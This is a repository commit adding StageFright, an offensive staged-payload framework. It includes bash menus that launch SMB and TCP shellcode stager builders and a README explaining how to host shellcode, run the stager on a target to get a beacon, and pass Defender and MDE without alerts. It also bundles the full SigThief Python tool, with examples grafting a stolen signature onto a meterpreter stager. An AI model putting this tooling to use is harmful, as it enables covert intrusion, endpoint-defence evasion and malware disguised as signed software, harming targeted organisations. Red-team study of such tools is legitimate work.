Add files via upload

StageFright/StageFright/DLL.sh

@@ -0,0 +1,76 @@
+#!/bin/bash
+
+NO_COLOR="\e[0m"
+WHITE="\e[0;17m"
+BOLD_WHITE="\e[1;37m"
+BLACK="\e[0;30m"
+BLUE="\e[0;34m"
+BOLD_BLUE="\e[1;34m"
+GREEN="\e[0;32m"
+BOLD_GREEN="\e[1;32m"
+CYAN="\e[0;36m"
+BOLD_CYAN="\e[1;36m"
+RED="\e[0;31m"
+BOLD_RED="\e[1;31m"
+PURPLE="\e[0;35m"
+BOLD_PURPLE="\e[1;35m"
+BROWN="\e[0;33m"
+BOLD_YELLOW="\e[1;33m"
+GRAY="\e[0;37m"
+BOLD_GRAY="\e[1;30m"
+red='\033[0;31m'
+green='\033[0;32m'
+yellow='\033[0;33m'
+blue='\033[0;34m'
+magenta='\033[0;35m'
+cyan='\033[0;36m'
+# Clear the color after that
+clear='\033[0m'
+
+function easyexit()
+{
+	clear
+	exit
+}
+
+function title() {
+echo -e "$BOLD_GREEN
+
+ _____ _                    ______    _       _     _   
+/  ___|| |                  |  ___|  (_)     | |   | |  
+\  --\_| |_ __ _  __   ___  | |_ ____ _  ____| |_  | |_ 
+ --\  |  __/ _ |/ _  |/ _ \ |  _|  __| |/ _  |  _ \| __|
+/\__/ / || (_| | (_| |  __/ | | | |  | | (_| | | | | |_ 
+\____/ \__\__,_|\__, |\___| \_| |_|  |_|\__, |_| |_|\__|
+                 __/ |                   __/ |          
+                |___/                   |___/           
+
+          **by assume-breach**
+
+       A staged payload framework. "
+}
+
+title
+echo -e $BOLD_CYAN
+echo "Choose an option:"
+echo ""
+echo -e "$BOLD_BLUE 1.$BOLD_WHITE SMB Stager DLL"
+echo -e "$BOLD_BLUE 2.$BOLD_WHITE TCP Stager DLL"
+echo ""
+echo -n -e "$BOLD_WHITE > "
+read CHOICE
+clear
+
+if [ $CHOICE == 1 ]; then
+	echo ""
+	bash StageFright/SMBDLL/SMBDLL.sh
+
+elif [ $CHOICE == 2 ]; then
+	echo ""
+	bash StageFright/TCPDLL/TCPDLL.sh
+
+else 
+	echo -e $BOLD_RED Invalid option
+	sleep 3
+	trap easyexit EXIT
+fi

StageFright/StageFright/EXE.sh

@@ -0,0 +1,76 @@
+#!/bin/bash
+
+NO_COLOR="\e[0m"
+WHITE="\e[0;17m"
+BOLD_WHITE="\e[1;37m"
+BLACK="\e[0;30m"
+BLUE="\e[0;34m"
+BOLD_BLUE="\e[1;34m"
+GREEN="\e[0;32m"
+BOLD_GREEN="\e[1;32m"
+CYAN="\e[0;36m"
+BOLD_CYAN="\e[1;36m"
+RED="\e[0;31m"
+BOLD_RED="\e[1;31m"
+PURPLE="\e[0;35m"
+BOLD_PURPLE="\e[1;35m"
+BROWN="\e[0;33m"
+BOLD_YELLOW="\e[1;33m"
+GRAY="\e[0;37m"
+BOLD_GRAY="\e[1;30m"
+red='\033[0;31m'
+green='\033[0;32m'
+yellow='\033[0;33m'
+blue='\033[0;34m'
+magenta='\033[0;35m'
+cyan='\033[0;36m'
+# Clear the color after that
+clear='\033[0m'
+
+function easyexit()
+{
+	clear
+	exit
+}
+
+function title() {
+echo -e "$BOLD_GREEN
+
+ _____ _                    ______    _       _     _   
+/  ___|| |                  |  ___|  (_)     | |   | |  
+\  --\_| |_ __ _  __   ___  | |_ ____ _  ____| |_  | |_ 
+ --\  |  __/ _ |/ _  |/ _ \ |  _|  __| |/ _  |  _ \| __|
+/\__/ / || (_| | (_| |  __/ | | | |  | | (_| | | | | |_ 
+\____/ \__\__,_|\__, |\___| \_| |_|  |_|\__, |_| |_|\__|
+                 __/ |                   __/ |          
+                |___/                   |___/           
+
+          **by assume-breach**
+
+       A staged payload framework. "
+}
+
+title
+echo -e $BOLD_CYAN
+echo "Choose an option:"
+echo ""
+echo -e "$BOLD_BLUE 1.$BOLD_WHITE AES Encrypted SMB Stager"
+echo -e "$BOLD_BLUE 2.$BOLD_WHITE AES Encrypted TCP Stager"
+echo ""
+echo -n -e "$BOLD_WHITE > "
+read CHOICE
+clear
+
+if [ $CHOICE == 1 ]; then
+	echo ""
+	bash StageFright/SMB/SMB.sh
+
+elif [ $CHOICE == 2 ]; then
+	echo ""
+	bash StageFright/TCP/TCP.sh
+
+else 
+	echo -e $BOLD_RED Invalid option
+	sleep 3
+	trap easyexit EXIT
+fi

StageFright/StageFright/ReadMe.md

@@ -0,0 +1,65 @@
+![Screenshot 2023-11-29 at 1 43 30 PM](https://github.com/assume-breach/Home-Grown-Red-Team/assets/76174163/b88fe959-5b3c-4b14-98a0-24b6c6f5b3e1)
+
+StageFright is a staged payload framework that allows the user to run customized staged payloads over various protocols. The framework is based on my blog article found here: https://medium.com/@assume-breach/home-grown-red-team-hosting-encrypted-stager-shellcode-1dc5e06eaeb3
+
+Right now, the only protocols in the framework are SMB and TCP. More will be available in the future; ie http/https.
+
+At this time, the tool will give you both DLLs and EXEs. 
+
+This is a replacement for the Shareable tool I uploaded a little while ago. Eventually, this tool will be merged into the Harriet tool, but for now, this is what I have finished. You can watch out for updates on Twitter as I will tweet out when new features and things have been added.
+
+How To Use
+
+bash StageFright.sh
+
+Go through the menus and select your stager. 
+
+![Screenshot 2023-11-29 at 1 54 06 PM](https://github.com/assume-breach/Home-Grown-Red-Team/assets/76174163/316dcf6a-fa2c-48f5-8198-b01f00315fd1)
+
+SMB Stager
+
+For SMB enter the values for the share/shared folder that is writable. 
+
+![Screenshot 2023-11-29 at 1 55 41 PM](https://github.com/assume-breach/Home-Grown-Red-Team/assets/76174163/dac1031c-b238-49bb-9280-9268e6582559)
+
+Upload your shellcode file to the share/shared folder.
+
+![Screenshot 2023-11-29 at 1 56 51 PM](https://github.com/assume-breach/Home-Grown-Red-Team/assets/76174163/1bcd1a50-9452-45fd-af8c-a34e4dfaa1b9)
+
+Run the tool. 
+
+![Screenshot 2023-11-29 at 1 58 22 PM](https://github.com/assume-breach/Home-Grown-Red-Team/assets/76174163/e8318b29-9a3d-43aa-944f-4ffb4df017fa)
+
+![Screenshot 2023-11-29 at 1 58 54 PM](https://github.com/assume-breach/Home-Grown-Red-Team/assets/76174163/af11eac6-2e2a-4d69-92d4-6e974260997d)
+
+If you get onto another machine on the network that has access to the shared/shared folder you can retrieve the shellcode file and get a beacon. I ran the tool on my DC which has access to the shared folder. 
+
+![Screenshot 2023-11-29 at 2 01 04 PM](https://github.com/assume-breach/Home-Grown-Red-Team/assets/76174163/f90ba02d-ca6c-447d-91e7-0960aa4f2fae)
+
+![Screenshot 2023-11-29 at 2 01 22 PM](https://github.com/assume-breach/Home-Grown-Red-Team/assets/76174163/ba44db8f-7ce5-443d-8890-313b02c42467)
+
+TCP Stager
+
+Go through the script.
+
+![Screenshot 2023-11-29 at 2 04 04 PM](https://github.com/assume-breach/Home-Grown-Red-Team/assets/76174163/76ff0178-f8b8-4b6b-9905-dbedde578275)
+
+You will have to host the TCP server. I have provided a python script to spin this up. You can find it in StageFright/StageFright/TCP. As of right now the script does not replace the values in the python script (it will over the next couple of days) so you will need to replace those values by hand. 
+
+![Screenshot 2023-11-29 at 2 06 21 PM](https://github.com/assume-breach/Home-Grown-Red-Team/assets/76174163/8f26a283-045f-4ece-9b8f-c474c2e37e49)
+
+Run the script to start the TCP server.
+
+![Screenshot 2023-11-29 at 2 08 03 PM](https://github.com/assume-breach/Home-Grown-Red-Team/assets/76174163/1b218e01-18a2-41d9-ad05-19a5ced4e12d)
+
+Transfer the EXE stager to the target and execute.
+
+![Screenshot 2023-11-29 at 2 10 04 PM](https://github.com/assume-breach/Home-Grown-Red-Team/assets/76174163/d3cd2371-d869-4112-8115-584ec27ee31b)
+
+![Screenshot 2023-11-29 at 2 10 25 PM](https://github.com/assume-breach/Home-Grown-Red-Team/assets/76174163/0882b329-ff59-41ea-ab5b-85f194a0de53)
+
+![Screenshot 2023-11-29 at 2 10 35 PM](https://github.com/assume-breach/Home-Grown-Red-Team/assets/76174163/dec8fa57-3fee-49ac-a1a6-845660072854)
+
+Everything should work out of box on Kali but for Mint/Ubuntu you will need to install MingW64 for compilation. This is the beginning of the project. Mainly releasing this so I have a base to go off of. No OPSEC considerations have been made at this time. Native APIs are used in some cases. Whatever AV/EDR that this gets past at this point is unknown. It will get past Defender and MDE (P1 trial license) with no alerts.  
+
+

StageFright/StageFright/Resources/LICENSE

@@ -0,0 +1,29 @@
+BSD 3-Clause License
+
+Copyright (c) 2017, Josh Pitts
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+
+* Redistributions of source code must retain the above copyright notice, this
+  list of conditions and the following disclaimer.
+
+* Redistributions in binary form must reproduce the above copyright notice,
+  this list of conditions and the following disclaimer in the documentation
+  and/or other materials provided with the distribution.
+
+* Neither the name of the copyright holder nor the names of its
+  contributors may be used to endorse or promote products derived from
+  this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

StageFright/StageFright/Resources/README.md

@@ -0,0 +1,93 @@
+# SigThief
+
+New version available to Dev-tier sponsors: https://github.com/sponsors/secretsquirrel
+
+Stable tier will have it End of Month August 2021
+
+---
+Stealing Signatures and Making One Invalid Signature at a Time (Unless you read this:
+https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf)
+
+https://twitter.com/subTee/status/912769644473098240
+![alt text](https://i.imgur.com/T05kwwn.png "https://twitter.com/subTee/status/912769644473098240")
+
+## For security professionals only...
+
+## What is this?
+
+I've noticed during testing against Anti-Virus over the years that each is different and each prioritize PE signatures differently, whether the signature is valid or not. There are some Anti-Virus vendors that give priority to certain certificate authorities without checking that the signature is actually valid, and there are those that just check to see that the certTable is populated with some value. It's a mess.
+
+So I'm releasing this tool to let you quickly do your testing and feel free to report it to vendors or not. 
+
+In short it will rip a signature off a signed PE file and append it to another one, fixing up the certificate table to sign the file. 
+
+Of course it's **not a valid signature** and that's the point!
+
+I look forward to hearing about your results!
+
+
+## How to use
+
+### Usage
+```
+Usage: sigthief.py [options]
+
+Options:
+  -h, --help            show this help message and exit
+  -i FILE, --file=FILE  input file
+  -r, --rip             rip signature off inputfile
+  -a, --add             add signautre to targetfile
+  -o OUTPUTFILE, --output=OUTPUTFILE
+                        output file
+  -s SIGFILE, --sig=SIGFILE
+                        binary signature from disk
+  -t TARGETFILE, --target=TARGETFILE
+                        file to append signature too
+  -c, --checksig        file to check if signed; does not verify signature
+  -T, --truncate        truncate signature (i.e. remove sig)
+```
+
+### Take a Signature from a binary and add it to another binary
+```
+$ ./sigthief.py -i tcpview.exe -t x86_meterpreter_stager.exe -o /tmp/msftesting_tcpview.exe 
+Output file: /tmp/msftesting_tcpview.exe
+Signature appended. 
+FIN.
+```
+
+### Save Signature to disk for use later
+```
+$ ./sigthief.py -i tcpview.exe -r                                                        
+Ripping signature to file!
+Output file: tcpview.exe_sig
+Signature ripped. 
+FIN.
+
+```
+
+### Use the ripped signature
+```
+$ ./sigthief.py -s tcpview.exe_sig -t x86_meterpreter_stager.exe                               
+Output file: x86_meterpreter_stager.exe_signed
+Signature appended. 
+FIN.
+
+```
+
+### Truncate (remove) signature
+This has really interesting results actually, can help you find AVs that value Signatures over functionality of code. Unsign putty.exe ;)
+
+```
+$ ./sigthief.py -i tcpview.exe -T    
+Inputfile is signed!
+Output file: tcpview.exe_nosig
+Overwriting certificate table pointer and truncating binary
+Signature removed. 
+FIN.
+```
+
+### Check if there is a signature (does not check validity)
+```
+$ ./sigthief.py -i tcpview.exe -c
+Inputfile is signed!
+```

StageFright/StageFright/Resources/SigThief/LICENSE

@@ -0,0 +1,29 @@
+BSD 3-Clause License
+
+Copyright (c) 2017, Josh Pitts
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+
+* Redistributions of source code must retain the above copyright notice, this
+  list of conditions and the following disclaimer.
+
+* Redistributions in binary form must reproduce the above copyright notice,
+  this list of conditions and the following disclaimer in the documentation
+  and/or other materials provided with the distribution.
+
+* Neither the name of the copyright holder nor the names of its
+  contributors may be used to endorse or promote products derived from
+  this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

StageFright/StageFright/Resources/SigThief/README.md

@@ -0,0 +1,93 @@
+# SigThief
+
+New version available to Dev-tier sponsors: https://github.com/sponsors/secretsquirrel
+
+Stable tier will have it End of Month August 2021
+
+---
+Stealing Signatures and Making One Invalid Signature at a Time (Unless you read this:
+https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf)
+
+https://twitter.com/subTee/status/912769644473098240
+![alt text](https://i.imgur.com/T05kwwn.png "https://twitter.com/subTee/status/912769644473098240")
+
+## For security professionals only...
+
+## What is this?
+
+I've noticed during testing against Anti-Virus over the years that each is different and each prioritize PE signatures differently, whether the signature is valid or not. There are some Anti-Virus vendors that give priority to certain certificate authorities without checking that the signature is actually valid, and there are those that just check to see that the certTable is populated with some value. It's a mess.
+
+So I'm releasing this tool to let you quickly do your testing and feel free to report it to vendors or not. 
+
+In short it will rip a signature off a signed PE file and append it to another one, fixing up the certificate table to sign the file. 
+
+Of course it's **not a valid signature** and that's the point!
+
+I look forward to hearing about your results!
+
+
+## How to use
+
+### Usage
+```
+Usage: sigthief.py [options]
+
+Options:
+  -h, --help            show this help message and exit
+  -i FILE, --file=FILE  input file
+  -r, --rip             rip signature off inputfile
+  -a, --add             add signautre to targetfile
+  -o OUTPUTFILE, --output=OUTPUTFILE
+                        output file
+  -s SIGFILE, --sig=SIGFILE
+                        binary signature from disk
+  -t TARGETFILE, --target=TARGETFILE
+                        file to append signature too
+  -c, --checksig        file to check if signed; does not verify signature
+  -T, --truncate        truncate signature (i.e. remove sig)
+```
+
+### Take a Signature from a binary and add it to another binary
+```
+$ ./sigthief.py -i tcpview.exe -t x86_meterpreter_stager.exe -o /tmp/msftesting_tcpview.exe 
+Output file: /tmp/msftesting_tcpview.exe
+Signature appended. 
+FIN.
+```
+
+### Save Signature to disk for use later
+```
+$ ./sigthief.py -i tcpview.exe -r                                                        
+Ripping signature to file!
+Output file: tcpview.exe_sig
+Signature ripped. 
+FIN.
+
+```
+
+### Use the ripped signature
+```
+$ ./sigthief.py -s tcpview.exe_sig -t x86_meterpreter_stager.exe                               
+Output file: x86_meterpreter_stager.exe_signed
+Signature appended. 
+FIN.
+
+```
+
+### Truncate (remove) signature
+This has really interesting results actually, can help you find AVs that value Signatures over functionality of code. Unsign putty.exe ;)
+
+```
+$ ./sigthief.py -i tcpview.exe -T    
+Inputfile is signed!
+Output file: tcpview.exe_nosig
+Overwriting certificate table pointer and truncating binary
+Signature removed. 
+FIN.
+```
+
+### Check if there is a signature (does not check validity)
+```
+$ ./sigthief.py -i tcpview.exe -c
+Inputfile is signed!
+```

StageFright/StageFright/Resources/SigThief/sigthief.py

@@ -0,0 +1,269 @@
+#!/usr/bin/env python3
+# LICENSE: BSD-3
+# Copyright: Josh Pitts @midnite_runr
+
+import sys
+import struct
+import shutil
+import io
+from optparse import OptionParser
+
+
+def gather_file_info_win(binary):
+        """
+        Borrowed from BDF...
+        I could just skip to certLOC... *shrug*
+        """
+        flItms = {}
+        binary = open(binary, 'rb')
+        binary.seek(int('3C', 16))
+        flItms['buffer'] = 0
+        flItms['JMPtoCodeAddress'] = 0
+        flItms['dis_frm_pehdrs_sectble'] = 248
+        flItms['pe_header_location'] = struct.unpack('<i', binary.read(4))[0]
+        # Start of COFF
+        flItms['COFF_Start'] = flItms['pe_header_location'] + 4
+        binary.seek(flItms['COFF_Start'])
+        flItms['MachineType'] = struct.unpack('<H', binary.read(2))[0]
+        binary.seek(flItms['COFF_Start'] + 2, 0)
+        flItms['NumberOfSections'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['TimeDateStamp'] = struct.unpack('<I', binary.read(4))[0]
+        binary.seek(flItms['COFF_Start'] + 16, 0)
+        flItms['SizeOfOptionalHeader'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['Characteristics'] = struct.unpack('<H', binary.read(2))[0]
+        #End of COFF
+        flItms['OptionalHeader_start'] = flItms['COFF_Start'] + 20
+
+        #if flItms['SizeOfOptionalHeader']:
+            #Begin Standard Fields section of Optional Header
+        binary.seek(flItms['OptionalHeader_start'])
+        flItms['Magic'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['MajorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
+        flItms['MinorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
+        flItms['SizeOfCode'] = struct.unpack("<I", binary.read(4))[0]
+        flItms['SizeOfInitializedData'] = struct.unpack("<I", binary.read(4))[0]
+        flItms['SizeOfUninitializedData'] = struct.unpack("<I",
+                                                               binary.read(4))[0]
+        flItms['AddressOfEntryPoint'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['PatchLocation'] = flItms['AddressOfEntryPoint']
+        flItms['BaseOfCode'] = struct.unpack('<I', binary.read(4))[0]
+        if flItms['Magic'] != 0x20B:
+            flItms['BaseOfData'] = struct.unpack('<I', binary.read(4))[0]
+        # End Standard Fields section of Optional Header
+        # Begin Windows-Specific Fields of Optional Header
+        if flItms['Magic'] == 0x20B:
+            flItms['ImageBase'] = struct.unpack('<Q', binary.read(8))[0]
+        else:
+            flItms['ImageBase'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['SectionAlignment'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['FileAlignment'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['MajorOperatingSystemVersion'] = struct.unpack('<H',
+                                                                   binary.read(2))[0]
+        flItms['MinorOperatingSystemVersion'] = struct.unpack('<H',
+                                                                   binary.read(2))[0]
+        flItms['MajorImageVersion'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['MinorImageVersion'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['MajorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['MinorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['Win32VersionValue'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['SizeOfImageLoc'] = binary.tell()
+        flItms['SizeOfImage'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['SizeOfHeaders'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['CheckSum'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['Subsystem'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['DllCharacteristics'] = struct.unpack('<H', binary.read(2))[0]
+        if flItms['Magic'] == 0x20B:
+            flItms['SizeOfStackReserve'] = struct.unpack('<Q', binary.read(8))[0]
+            flItms['SizeOfStackCommit'] = struct.unpack('<Q', binary.read(8))[0]
+            flItms['SizeOfHeapReserve'] = struct.unpack('<Q', binary.read(8))[0]
+            flItms['SizeOfHeapCommit'] = struct.unpack('<Q', binary.read(8))[0]
+
+        else:
+            flItms['SizeOfStackReserve'] = struct.unpack('<I', binary.read(4))[0]
+            flItms['SizeOfStackCommit'] = struct.unpack('<I', binary.read(4))[0]
+            flItms['SizeOfHeapReserve'] = struct.unpack('<I', binary.read(4))[0]
+            flItms['SizeOfHeapCommit'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['LoaderFlags'] = struct.unpack('<I', binary.read(4))[0]  # zero
+        flItms['NumberofRvaAndSizes'] = struct.unpack('<I', binary.read(4))[0]
+        # End Windows-Specific Fields of Optional Header
+        # Begin Data Directories of Optional Header
+        flItms['ExportTableRVA'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['ExportTableSize'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['ImportTableLOCInPEOptHdrs'] = binary.tell()
+        #ImportTable SIZE|LOC
+        flItms['ImportTableRVA'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['ImportTableSize'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['ResourceTable'] = struct.unpack('<Q', binary.read(8))[0]
+        flItms['ExceptionTable'] = struct.unpack('<Q', binary.read(8))[0]
+        flItms['CertTableLOC'] = binary.tell()
+        flItms['CertLOC'] = struct.unpack("<I", binary.read(4))[0]
+        flItms['CertSize'] = struct.unpack("<I", binary.read(4))[0]
+        binary.close()
+        return flItms
+
+
+def copyCert(exe):
+    flItms = gather_file_info_win(exe)
+
+    if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
+        # not signed
+        print("Input file Not signed!")
+        sys.exit(-1)
+
+    with open(exe, 'rb') as f:
+        f.seek(flItms['CertLOC'], 0)
+        cert = f.read(flItms['CertSize'])
+    return cert
+
+
+def writeCert(cert, exe, output):
+    flItms = gather_file_info_win(exe)
+    
+    if not output: 
+        output = output = str(exe) + "_signed"
+
+    shutil.copy2(exe, output)
+    
+    print("Output file: {0}".format(output))
+
+    with open(exe, 'rb') as g:
+        with open(output, 'wb') as f:
+            f.write(g.read())
+            f.seek(0)
+            f.seek(flItms['CertTableLOC'], 0)
+            f.write(struct.pack("<I", len(open(exe, 'rb').read())))
+            f.write(struct.pack("<I", len(cert)))
+            f.seek(0, io.SEEK_END)
+            f.write(cert)
+
+    print("Signature appended. \nFIN.")
+
+
+def outputCert(exe, output):
+    cert = copyCert(exe)
+    if not output:
+        output = str(exe) + "_sig"
+
+    print("Output file: {0}".format(output))
+
+    open(output, 'wb').write(cert)
+
+    print("Signature ripped. \nFIN.")
+
+
+def check_sig(exe):
+    flItms = gather_file_info_win(exe)
+ 
+    if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
+        # not signed
+        print("Inputfile Not signed!")
+    else:
+        print("Inputfile is signed!")
+
+
+def truncate(exe, output):
+    flItms = gather_file_info_win(exe)
+ 
+    if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
+        # not signed
+        print("Inputfile Not signed!")
+        sys.exit(-1)
+    else:
+        print( "Inputfile is signed!")
+
+    if not output:
+        output = str(exe) + "_nosig"
+
+    print("Output file: {0}".format(output))
+
+    shutil.copy2(exe, output)
+
+    with open(output, "r+b") as binary:
+        print('Overwriting certificate table pointer and truncating binary')
+        binary.seek(-flItms['CertSize'], io.SEEK_END)
+        binary.truncate()
+        binary.seek(flItms['CertTableLOC'], 0)
+        binary.write(b"\x00\x00\x00\x00\x00\x00\x00\x00")
+
+    print("Signature removed. \nFIN.")
+
+
+def signfile(exe, sigfile, output):
+    flItms = gather_file_info_win(exe)
+    
+    cert = open(sigfile, 'rb').read()
+
+    if not output: 
+        output = output = str(exe) + "_signed"
+
+    shutil.copy2(exe, output)
+    
+    print("Output file: {0}".format(output))
+    
+    with open(exe, 'rb') as g:
+        with open(output, 'wb') as f:
+            f.write(g.read())
+            f.seek(0)
+            f.seek(flItms['CertTableLOC'], 0)
+            f.write(struct.pack("<I", len(open(exe, 'rb').read())))
+            f.write(struct.pack("<I", len(cert)))
+            f.seek(0, io.SEEK_END)
+            f.write(cert)
+    print("Signature appended. \nFIN.")
+
+
+if __name__ == "__main__":
+    usage = 'usage: %prog [options]'
+    print("\n\n!! New Version available now for Dev Tier Sponsors! Sponsor here: https://github.com/sponsors/secretsquirrel\n\n")
+    parser = OptionParser()
+    parser.add_option("-i", "--file", dest="inputfile", 
+                  help="input file", metavar="FILE")
+    parser.add_option('-r', '--rip', dest='ripsig', action='store_true',
+                  help='rip signature off inputfile')
+    parser.add_option('-a', '--add', dest='addsig', action='store_true',
+                  help='add signautre to targetfile')
+    parser.add_option('-o', '--output', dest='outputfile',
+                  help='output file')
+    parser.add_option('-s', '--sig', dest='sigfile',
+                  help='binary signature from disk')
+    parser.add_option('-t', '--target', dest='targetfile',
+                  help='file to append signature to')
+    parser.add_option('-c', '--checksig', dest='checksig', action='store_true',
+                  help='file to check if signed; does not verify signature')
+    parser.add_option('-T', '--truncate', dest="truncate", action='store_true',
+                  help='truncate signature (i.e. remove sig)')
+    (options, args) = parser.parse_args()
+    
+    # rip signature
+    # inputfile and rip to outputfile
+    if options.inputfile and options.ripsig:
+        print("Ripping signature to file!")
+        outputCert(options.inputfile, options.outputfile)
+        sys.exit()    
+
+    # copy from one to another
+    # inputfile and rip to targetfile to outputfile    
+    if options.inputfile and options.targetfile:
+        cert = copyCert(options.inputfile)
+        writeCert(cert, options.targetfile, options.outputfile)
+        sys.exit()
+
+    # check signature
+    # inputfile 
+    if options.inputfile and options.checksig:
+        check_sig(options.inputfile) 
+        sys.exit()
+
+    # add sig to target file
+    if options.targetfile and options.sigfile:
+        signfile(options.targetfile, options.sigfile, options.outputfile)
+        sys.exit()
+        
+    # truncate
+    if options.inputfile and options.truncate:
+        truncate(options.inputfile, options.outputfile)
+        sys.exit()
+
+    parser.print_help()
+    parser.error("You must do something!")
+

StageFright/StageFright/StageFright.sh

@@ -0,0 +1,76 @@
+#!/bin/bash
+
+NO_COLOR="\e[0m"
+WHITE="\e[0;17m"
+BOLD_WHITE="\e[1;37m"
+BLACK="\e[0;30m"
+BLUE="\e[0;34m"
+BOLD_BLUE="\e[1;34m"
+GREEN="\e[0;32m"
+BOLD_GREEN="\e[1;32m"
+CYAN="\e[0;36m"
+BOLD_CYAN="\e[1;36m"
+RED="\e[0;31m"
+BOLD_RED="\e[1;31m"
+PURPLE="\e[0;35m"
+BOLD_PURPLE="\e[1;35m"
+BROWN="\e[0;33m"
+BOLD_YELLOW="\e[1;33m"
+GRAY="\e[0;37m"
+BOLD_GRAY="\e[1;30m"
+red='\033[0;31m'
+green='\033[0;32m'
+yellow='\033[0;33m'
+blue='\033[0;34m'
+magenta='\033[0;35m'
+cyan='\033[0;36m'
+# Clear the color after that
+clear='\033[0m'
+
+function easyexit()
+{
+	clear
+	exit
+}
+
+function title() {
+echo -e "$BOLD_GREEN
+
+ _____ _                    ______    _       _     _   
+/  ___|| |                  |  ___|  (_)     | |   | |  
+\  --\_| |_ __ _  __   ___  | |_ ____ _  ____| |_  | |_ 
+ --\  |  __/ _ |/ _  |/ _ \ |  _|  __| |/ _  |  _ \| __|
+/\__/ / || (_| | (_| |  __/ | | | |  | | (_| | | | | |_ 
+\____/ \__\__,_|\__, |\___| \_| |_|  |_|\__, |_| |_|\__|
+                 __/ |                   __/ |          
+                |___/                   |___/           
+
+                **by assume-breach**
+
+             A staged payload framework." 
+}
+
+title
+echo -e $BOLD_CYAN
+echo "Choose an option:"
+echo ""
+echo -e "$BOLD_BLUE 1.$BOLD_WHITE Create Staged EXE"
+echo -e "$BOLD_BLUE 2.$BOLD_WHITE Create Staged DLL"
+echo ""
+echo -n -e "$BOLD_WHITE > "
+read CHOICE
+clear
+
+if [ $CHOICE == 1 ]; then
+	echo ""
+	bash EXE.sh
+
+elif [ $CHOICE == 2 ]; then
+	echo ""
+	bash DLL.sh
+
+else
+	echo -e $BOLD_RED Invalid option
+	sleep 3
+	trap easyexit EXIT
+fi

StageFright/StageFright/StageFright/Resources/SigThief/LICENSE

@@ -0,0 +1,29 @@
+BSD 3-Clause License
+
+Copyright (c) 2017, Josh Pitts
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+
+* Redistributions of source code must retain the above copyright notice, this
+  list of conditions and the following disclaimer.
+
+* Redistributions in binary form must reproduce the above copyright notice,
+  this list of conditions and the following disclaimer in the documentation
+  and/or other materials provided with the distribution.
+
+* Neither the name of the copyright holder nor the names of its
+  contributors may be used to endorse or promote products derived from
+  this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
